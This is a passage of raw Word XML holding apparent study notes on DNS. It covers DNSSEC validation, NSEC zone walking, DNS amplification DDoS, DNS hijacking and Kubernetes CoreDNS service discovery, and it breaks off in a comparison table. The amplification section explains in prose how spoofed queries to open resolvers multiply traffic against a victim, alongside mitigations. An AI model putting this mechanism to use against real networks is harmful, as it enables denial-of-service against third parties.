    <w:p w14:paraId="2510E7D7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver queries www.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149ADAC8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Gets the A record + RRSIG (signature).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7DC90" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Gets the DNSKEY from example.com (to verify the signature).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756532BC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Gets the DS record from .com zone (to verify the DNSKEY is legitimate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46585FDD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Gets the DNSKEY from .com (to verify the DS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47628E02" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Gets the DS from the root (to verify .com's DNSKEY).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEEABB5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Trust anchor (root DNSKEY) validates the entire chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E1573" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NSEC/NSEC3 — Authenticated denial of existence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C99652" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When a name doesn't exist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0198B4D0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="769"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NSEC:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Returns the "gap" between two existing names. "Between mail.example.com and www.example.com, nothing exists." Signed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D4E0D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="769"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Problem: NSEC reveals ALL names in the zone (zone walking attack — enumerate all records).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4888354B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="769"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NSEC3:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Uses hashed names instead of plaintext. You can prove non-existence without revealing other names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C716B1E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNSSEC deployment challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162734D1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key management:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Key rotation, emergency key rollover. If you lose the signing key, your zone becomes unresolvable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922045F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response size:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> RRSIG records significantly increase response sizes (often exceed 512 bytes → require EDNS0 or TCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290EB789" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amplification attacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Large DNSSEC responses make DNS reflection attacks more powerful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A3C289" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Signing errors → zone becomes "bogus" → resolvers reject ALL records (complete outage worse than no DNSSEC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096ACB5A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 DNS Amplification DDoS Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107FD68" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A916416" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Attacker spoofs the source IP of their query (sets source = victim's IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B969A7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Sends a small query (60 bytes) to open DNS resolvers requesting a large record (e.g., ANY query or DNSSEC-signed record).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216CDFD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver sends a large response (3000+ bytes) to the victim's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE91DBB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Amplification factor: 50x–100x (60 bytes → 3000+ bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2658F6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>With thousands of open resolvers, a 1 Gbps attacker generates 50–100 Gbps at the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FC0E4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07B77B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BCP38/Source address validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> ISPs should prevent spoofed source IPs from leaving their networks. (Not universally implemented.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3516BC8E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response Rate Limiting (RRL):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Authoritative servers limit identical responses per source IP per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C6961" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disabling open recursion:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Recursive resolvers should only serve their own clients (not the entire internet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42738741" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blocking ANY queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Many servers now refuse ANY queries from external sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65189A5C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.4 DNS Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE69BC7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F311C2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Registrar hijacking:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Attacker gains access to your domain registrar account (phishing, social engineering) and changes your NS records to point to attacker-controlled nameservers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD320A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BGP hijacking of NS IPs:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Attacker announces the IP range of your nameservers via BGP, intercepting queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F759F6C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="773"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compromised nameserver:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Attacker gains access to your authoritative nameserver and modifies records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71BA64" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C086517" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="774"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Registrar lock (prevents unauthorized transfers/changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B3098" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="774"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Multi-factor authentication on registrar accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53242031" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="774"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Registry lock (additional protection at the registry level — requires manual verification for changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF3E400" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="774"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>CAA records (limit who can issue certificates, preventing attacker from getting valid HTTPS certs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E9291" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="774"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNSSEC (modifications are detected by resolvers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C991DB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="32B3F9E1">
          <v:rect id="_x0000_i3485" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED357B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10. DNS in Microservices and Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A298EFE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Internal DNS for Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F8D61" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Kubernetes DNS works (CoreDNS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF7350" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Every Service in Kubernetes gets a DNS name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B7C34B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CBD835" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>my-service.my-namespace.svc.cluster.local → ClusterIP (10.96.0.45)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132396D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Every Pod gets a DNS name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED1F213" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474096E6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>10-244-1-5.my-namespace.pod.cluster.local → 10.244.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E9C0C9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Headless Services (no ClusterIP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0995A096" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3E4B7F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>my-service.my-namespace.svc.cluster.local → [10.244.1.5, 10.244.1.6, 10.244.1.7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE31909" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Returns ALL pod IPs directly (not a virtual IP). Enables client-side load balancing (gRPC uses this).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F443632" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CoreDNS serves these internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E02AC0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="775"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>CoreDNS watches the Kubernetes API for Service/Pod/Endpoint changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D4FB11" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="775"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Maintains an in-memory database of all DNS records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B083A1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="775"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>When a pod queries a service name, CoreDNS responds with the current endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6AA20" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="775"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>TTL is typically 5–30 seconds (low, to reflect rapid pod churn).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA98A61" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 DNS vs. Service Registry (Consul, etcd)</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97"/>
        <w:gridCol w:w="3655"/>
        <w:gridCol w:w="3698"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="16B7020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2E95B5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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32453B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DNS-based discovery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96A14D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Registry-based (Consul/etcd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="4102D96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D4C419" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Protocol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739D7E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Standard DNS (any client works)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6DBD45" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Custom API (requires client library)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="1BEEA98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5A4BDC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Health checking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1D06CC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Limited (DNS doesn't propagate health well)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9A8BB6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Rich (HTTP, TCP, script, gRPC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="67CF46B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EA3C71" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:lastRenderedPageBreak/>
              <w:t>Metadata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1D8ED3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Limited (TXT records, SRV weight/port)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FCEAFA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Rich (key-value, tags, arbitrary metadata)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
